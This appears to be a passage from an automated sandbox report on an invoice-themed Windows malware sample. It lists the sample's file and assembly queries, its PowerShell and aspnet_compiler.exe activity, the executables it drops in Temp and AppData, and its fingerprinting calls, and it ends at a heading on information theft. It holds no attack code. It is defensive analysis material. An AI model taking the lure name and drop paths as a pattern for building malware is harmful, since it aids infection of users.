Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\dwn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\ VolumeInformation

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_10002933 cpuid

12_2_10002933

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 12_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_10002264

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 14_2_0041739B GetVersionExW,

14_2_0041739B

Stealing of Sensitive Information

